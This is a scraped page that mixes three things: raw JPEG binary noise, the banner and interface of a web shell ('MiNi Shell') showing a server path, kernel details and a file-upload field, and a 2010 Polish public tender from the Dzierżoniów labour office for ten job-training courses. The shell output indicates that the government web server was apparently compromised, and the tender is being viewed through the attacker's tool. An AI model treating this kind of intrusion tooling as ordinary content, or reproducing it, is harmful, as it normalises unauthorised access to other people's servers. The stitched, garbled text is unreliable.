JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100416/109078-N-2010.html

<p class="kh_header"><b>Dzierżoniów: Usługa na realizację 10 szkoleń grupowych dla osób bezrobotnych oraz dla osób poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Dzierżoniowie - finansowanych z Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 109078 - 2010; data zamieszczenia: 16.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , Rynek 27, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 074 8320380, 8325254, faks 074 8312347.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa na realizację 10 szkoleń grupowych dla osób bezrobotnych oraz dla osób poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Dzierżoniowie - finansowanych z Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja 10 szkoleń grupowych pn.: 
1. Sprzedawca z obsługą kas fiskalnych, terminalu kart płatniczych oraz fakturowaniem, elementami towaroznawstwa z treningiem umiejętności interpersonalnych dla 2 grup 15 osobowych.
2. Księgowość z zagadnieniami kadrowymi z obsługą programów kadrowo 
-księgowych (co najmniej po 2 programy) dla 1 grupy 15 osobowej.
3. Projektowanie i aranżacja wnętrz z elementami florystyki, decupage  
i przedsiębiorczości dla 1 grupy 10 osobowej.
4. Opiekunka środowiskowa z treningiem umiejętności interpersonalnych i praktyką  u pracodawcy dla 1 grupy 15 osobowej.
5. Opiekunka dziecięca z blokiem języka angielskiego oraz z elementami przedsiębiorczości i elementami pedagogiki opiekuńczo - wychowawczej 
oraz praktyką u pracodawcy dla 1 grupy 10 osobowej.
6. Asystentka - sekretarka z obsługą urządzeń  biurowych, blokiem języka angielskiego, treningiem umiejętności interpersonalnych i asertywności  oraz poszerzoną obsługą programu Excel dla 1 grupy 10 osobowej.
7. Krawiec - szwacz z elementami przedsiębiorczości dla 1 grupy 10 osobowej.
8. Grafika komputerowa oraz projektowanie stron www z elementami  przedsiębiorczości dla 1 grupy 10 osobowej.
9. Podstawy przedsiębiorczości dla 8 grup 15 osobowych.
10. Profesjonalna organizacja i obsługa imprez okolicznościowych z kursem przygotowującym do egzaminu państwowego na prawo jazdy kat. B, treningiem umiejętności interpersonalnych oraz elementami przedsiębiorczości dla 1 grupy 15 osobowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Kwalifikacje kadry dydaktycznej - 35</li>
<li>3 - Certyfikat jakości usług - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień umowy:
a) jeżeli takie zmiany wynikają z powszechnie obowiązujących przepisów prawa,
b) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
c) z powodu okoliczności siły wyższej np. zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, 
w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznym rozmiarach,
d) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które 
to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupdzierzoniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 58 - 200 Dzierżoniów, Rynek 27 (pokój 102).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2010 godzina 09:00, miejsce: 58 - 200 Dzierżoniów, Rynek 27 (pokój 102).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedawca z obsługą kas fiskalnych, terminalu kart płatniczych oraz fakturowaniem, elementami towaroznawstwa z treningiem umiejętności interpersonalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 2 grup 15 osobowych. 
2.Termin rozpoczęcia szkolenia:  dla pierwszej grupy - maj 2010r.;      
dla drugiej grupy - czerwiec 2010r.
3.Wymagana ilość godzin szkolenia:300 godz. szkolenia na 1 uczestnika (łącznie 
z egzaminem wewnętrznym), w tym:100 godz. teorii + 20 godz. treningu umiejętności interpersonalnych oraz 180 godz. praktyki.   
4. Zakres szkolenia: zapoznanie z podstawowymi pojęciami obowiązującymi 
w jednostce handlowej; poznanie otoczenia przedsiębiorstwa handlowego, marketing i reklama w handlu detalicznym; rodzaje punktów sprzedaży i ich charakterystyka, wyposażenie punktu sprzedaży detalicznej, zapotrzebowanie
i zakup towarów w jednostce handlu detalicznego; organizacja gospodarki magazynowej, rozmieszczenie i przechowywanie towarów w jednostkach handlu detalicznego, obliczenia sklepowe, kształtowanie cen w jednostkach sprzedaży, inkasowanie należności za sprzedane produkty, wypełnianie dokumentacji związanej ze sprzedażą, obsługiwanie klienta z wykorzystaniem aktywnych metod sprzedaży, zawieranie transakcji sprzedaży; dekorowanie wnętrza sklepu i okna wystawowego; ogólne przepisy bhp obowiązujące w jednostce handlowej, udzielanie pierwszej pomocy w miejscu wypadku; obsługa terminalu kart płatniczych, nauka fakturowania, towaroznawstwo; trening umiejętności interpersonalnych.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenia przeznaczone są dla osób bezrobotnych i poszukujących pracy, które  posiadają wykształcenie min. podstawowe, zamierzają zdobyć lub uzupełnić wiadomości 
i umiejętności zawodowe lub dokonać zmiany zawodu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Księgowość z zagadnieniami kadrowymi z obsługą programów kadrowo - księgowych (co najmniej 
po 2 programy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1grupy 15 osobowej. 
2. Termin rozpoczęcia szkolenia: maj 2010 r.      
3. Wymagana ilość godzin szkolenia: 430 godz. szkolenia na 1 uczestnika (łącznie 
z egzaminem wewnętrznym), w tym: 230 godz. teorii oraz 100 godz. praktyki oraz 100 godz. obsługi programów komputerowych.
4. Zakres szkolenia: zasady rachunkowości, rozrachunki i roszczenia, obsługa programów kadrowo - płacowych, obrót materiałowy i towarowy, aktywa trwałe, przepisy prawa pracy i ich praktyczne zastosowanie; prawo ubezpieczeń społecznych; procedury postępowania zakładu pracy wynikające z obowiązku ubezpieczeń; naliczanie płac; zajęcia praktyczne dot. obsługi komputera oraz programów użytkowych.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. średnie i zamierzają zdobyć lub uzupełnić wiadomości 
i umiejętności zawodowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Projektowanie i aranżacja wnętrz z elementami florystyki, decupage  i przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1grupy 10 osobowej. 
2. Termin rozpoczęcia szkolenia: maj 2010 r. 
3. Wymagana ilość godzin szkolenia: 300 godz. szkolenia na 1 uczestnika  (łącznie z egzaminem wewnętrznym), w tym: 60 godz. teorii + 20 godz. podstaw przedsiębiorczości oraz 220 godz. praktyki.    
4. Zakres szkolenia: techniki dekoratorskie, teoria kolorów, struktur i faktur, podstawy rysunku, podstawy rysunku odręcznego, materiałoznawstwo, meble 
i elementy wyposażenia, zasady feng shui, techniki i metody dekoracji wnętrz; elementy florystyki, decupage i przedsiębiorczości.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. podstawowe oraz  zamierzają zdobyć lub uzupełnić wiadomości 
i umiejętności zawodowe lub dokonać zmiany zawodu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opiekunka środowiskowa z treningiem umiejętności interpersonalnych i praktyką  u pracodawcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1grupy 15 osobowej. 
2. Termin rozpoczęcia szkolenia: październik 2010r. 
3. Wymagana ilość godzin szkolenia: 340 godz. szkolenia na 1 uczestnika (łącznie 
z egzaminem wewnętrznym), w tym: 100 godz. teorii + 40 godz. treningu interpersonalnego oraz 200 godz. praktyki (w tym 70 godz. praktyki 
u pracodawcy).    
4. Zakres szkolenia: przygotowywanie posiłków, utrzymanie czystości 
w otoczeniu podopiecznego; załatwienie spraw podopiecznego związanych 
z gospodarstwem domowym, utrzymanie czystości skóry i łóżka, zaspokajanie potrzeb wydalania i odżywiania; wykonywanie pomiarów podstawowych parametrów życiowych, realizowanie zadań zleconych przez lekarza, usprawnianie podopiecznego w obrębie łóżka i mieszkania, udzielanie pierwszej pomocy przedlekarskiej w stanach zagrożenia życia; stosowanie technik zbierania informacji, rozpoznawanie potrzeb podopiecznego w zakresie wykorzystania czasu wolnego; stosowanie wybranych form terapii zajęciowej, organizowanie zajęć rekreacyjnych podopiecznego; trening umiejętności interpersonalnych.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: 
szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. podstawowe oraz  zamierzają zdobyć lub uzupełnić wiadomości i umiejętności zawodowe lub dokonać zmiany zawodu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Ceryfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opiekunka dziecięca z blokiem języka angielskiego oraz z elementami przedsiębiorczości i elementami pedagogiki opiekuńczo - wychowawczej oraz praktyką u pracodawcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1grupy 10 osobowej. 
2. Termin rozpoczęcia szkolenia: maj 2010r. 
3. Wymagana ilość godzin szkolenia: 330 godz. szkolenia na 1 uczestnika (łącznie  z egzaminem wewnętrznym),  w tym: 100 godz. teorii + 20 godz. przedsiębiorczości + 40 godz. elementów pedagogiki opiekuńczo - wychowawczej 
+ 70 godz. j. angielskiego oraz 100 godz. praktyki, w tym 40 godz. u pracodawcy.   
4. Zakres szkolenia: stosowanie wybranych metod poznawania dziecka, określanie potrzeb dziecka i sposobów ich zaspakajania, stosowanie podstawowych zasad 
i metod wychowania, wychowanie dziecka w środowisku instytucjonalnym, stosowanie wybranych zabaw i gier wpływających na rozwój dziecka, utrzymanie czystości skóry dziecka i jego otoczenia, zaspakajanie podstawowych potrzeb fizjologicznych dziecka, udzielanie pierwszej pomocy przedlekarskiej w stanach zagrożenia życia, zapobieganie urazowości, pomaganie w wykonywaniu pomiarów podstawowych parametrów życiowych, zapobieganie chorobom.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. średnie i chcą dokonać zmiany zawodu lub zamierzają zdobyć lub uzupełnić wiadomości i umiejętności zawodowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Asystentka - sekretarka z obsługą urządzeń  biurowych, blokiem języka angielskiego, treningiem umiejętności interpersonalnych i asertywności  oraz poszerzoną obsługą programu Excel.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1grupy 10 osobowej. 
2. Termin rozpoczęcia szkolenia: maj 2010 r. 
 3. Wymagana ilość godzin szkolenia: 390 godz. szkolenia na 1 uczestnika (łącznie z egzaminem wewnętrznym), w tym: 70 godz. teorii  + 200 godz. języka angielskiego + 20 godz. treningu interpersonalnego + 20 godz. treningu asertywności oraz 80 godz. praktycznej obsługi komputera.
4. Zakres szkolenia: organizacja pracy sekretariatu, struktura organizacyjna zakładu pracy, czynności kancelaryjne, przechowywanie akt, normy etyczne 
i porządkowe w miejscu pracy; obsługa komputera - budowa sprzętu komputerowego; operacje na plikach, dyskach, katalogach, system Windows, terminarze komputerowe i ich zastosowanie, edytor tekstów - pisanie i edycja tekstu, szablony dokumentów, komunikacja w sieci on-line , obsługa poczty elektronicznej i Internetu; wysyłanie i odbieranie faksów; przepisy bhp 
i ppoż.; moduł języka angielskiego; poszerzona obsługa programu Excel, trening umiejętności interpersonalnych, trening asertywności.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. średnie i chcą dokonać zmiany zawodu lub zamierzają zdobyć lub uzupełnić wiadomości i umiejętności zawodowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Krawiec - szwacz z elementami przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1grupy 10 osobowej. 
2. Termin rozpoczęcia szkolenia: maj 2010 r. 
3. Wymagana ilość godzin szkolenia: 500 godz. szkolenia na 1 uczestnika (łącznie 
z egzaminem wewnętrznym), w tym: 100 godz. teorii + 20 godz. elementów przedsiębiorczości oraz 380 godz. praktyki.      
4. Zakres szkolenia: praktyczne przyuczenie do zawodu - obsługa maszyn, technika krojenia, podstawy technologii, szycie odzieży, elementy przedsiębiorczości.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. podstawowe oraz  zamierzają zdobyć lub uzupełnić wiadomości
i umiejętności zawodowe lub dokonać zmiany zawodu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Grafika komputerowa oraz projektowanie stron www z elementami przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 1grupy 10 osobowej. 
2. Termin rozpoczęcia szkolenia: czerwiec 2010r. 
3. Wymagana ilość godzin szkolenia: 200 godz. szkolenia  na 1 uczestnika  (łącznie z egzaminem wewnętrznym), w tym: 50 godz. teorii + 20 godz. przedsiębiorczości oraz 130 godz. praktyki. 
4. Zakres szkolenia: nauka obsługi programów Corel Draw, Photoshop, Adobe In Design, nauka tworzenia stron internetowych w HTML i CCS
 z wykorzystaniem elementów interaktywnych w językach skryptowych, elementy przedsiębiorczości.
5. Charakterystyka osób, dla których szkolenie jest przeznaczone: szkolenie przeznaczone jest dla osób bezrobotnych i poszukujących pracy, które posiadają wykształcenie min. średnie, zamierzają zdobyć lub uzupełnić wiadomości 
i umiejętności zawodowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje kadry dydaktycznej - 35</li>
<li>3. Certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Podstawy przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szkolenie dla 8 grup 15 osobowych. 
